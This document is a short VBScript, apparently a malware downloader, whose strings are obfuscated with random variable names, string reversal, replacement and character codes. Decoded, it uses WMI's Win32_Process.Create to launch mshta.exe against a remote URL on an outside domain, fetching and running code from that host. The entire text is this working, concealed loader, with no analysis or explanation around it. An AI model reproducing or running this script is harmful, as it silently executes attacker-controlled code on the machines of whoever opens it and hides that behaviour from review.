
XQVGCLLVJINNBCYHJVFJXD = ""&chr(51)&"n"+"i"&chr(119)&""
BXEUPEEWPNYIIALIUWFKWR = Replace("2"+XQVGCLLVJINNBCYHJVFJXD+"SPIUQTCVAJDIREUOLEWUPIt","SPIUQTCVAJDIREUOLEWUPI",":"&chr(115)&"")
YZYBOPAUGNFTWWKFWIZLVQ = Replace("rFEIZHFYASFDOBRWRSKYGLG_"+BXEUPEEWPNYIIALIUWFKWR+""&chr(77)&"","FEIZHFYASFDOBRWRSKYGLG",""&chr(80)&"")
ADGJETDHVOGZFOQLZSORPU = Replace("IZYGENSIQEVQZZNGBIDHGQ"+YZYBOPAUGNFTWWKFWIZLVQ+"g"&chr(77)&"","IZYGENSIQEVQZZNGBIDHGQ","o")
DRDPCDQISDUYWGPXUGGQEU = Replace("GUBUSZKVVKSFLEQNZZYLWY"+ADGJETDHVOGZFOQLZSORPU+"ni","GUBUSZKVVKSFLEQNZZYLWY",""&chr(69)&"c")
GUKRGDHWWZFJNLCAOQHGDB = ""&chr(69)&".a"&chr(116)&""
HPULQBKZHPRLHPVAWPAFGK = ""&chr(88)&""+GUKRGDHWWZFJNLCAOQHGDB+"h"
GHFBNJYGJJFDAWCTFGFIYU = ""&chr(69)&""
set OGVKCGBRXWOWXAXWNBHBCD = GetObject(Replace(StrReverse("RCXVWGIKBPQGNOTFXJXXLORCXVWGIKBPQGNOTFXJXXLO"+DRDPCDQISDUYWGPXUGGQEU+"w"),"OLXXJXFTONGQPBKIGWVXCR",""&chr(115)&""))
ODUROGFDAULSAWXQAWPDWW = OGVKCGBRXWOWXAXWNBHBCD.Create (Replace(StrReverse(" "+GHFBNJYGJJFDAWCTFGFIYU+""+HPULQBKZHPRLHPVAWPAFGK+"sSTHIQDTLCQPYTJEQPVNNDD"),"DDNNVPQEJTYPQCLTDQIHTS",""&chr(77)&"")+Replace(StrReverse("txt.ffsLKYTYBHXTZYKGOQJRVOARSsegamiLKYTYBHXTZYKGOQJRVOARSmoc.cnmpuLKYTYBHXTZYKGOQJRVOARSLKYTYBHXTZYKGOQJRVOARS:sptth"),"SRAOVRJQOGKYZTXHBYTYKL","/"),null,null,processid)
